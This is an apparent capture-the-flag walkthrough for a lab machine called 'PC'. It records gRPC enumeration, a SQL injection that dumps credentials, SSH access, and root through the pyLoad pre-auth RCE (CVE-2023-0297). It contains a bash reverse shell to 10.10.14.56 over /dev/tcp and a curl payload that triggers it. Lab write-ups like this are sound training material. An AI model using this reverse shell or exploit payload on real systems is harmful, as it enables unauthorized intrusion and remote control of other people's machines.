PC

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

https://www.huxxit.com/index.php/2023/05/25/notes-on-pentesting-ctf-hacking-a- grpc-application/

gRPC Page

Initial Foothold

Tried admin/admin

Looks like the id is parameter is vulnerable to sql injection

Dumping the database shows a username/password:

Logged in as sau via ssh

User.txt Proof Screenshot

Privilege Escalation

Port forwarded via ssh:
ssh -L 8000:localhost:8000 sau@10.129.92.35

pyLoad may be vulnerable to unauthenticated RCE
https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

Created a bash script test.sh:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.56/8888 0>&1

Executed Command:

curl -i -s -k -X $'POST'     --data-binary $'jk=pyimport%20os;os.system(\"/home/sau/.tmp/test.sh");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'     $'http://127.0.0.1:8000/flash/addcrypted2'

Received Root shell

RootScreenshot Here: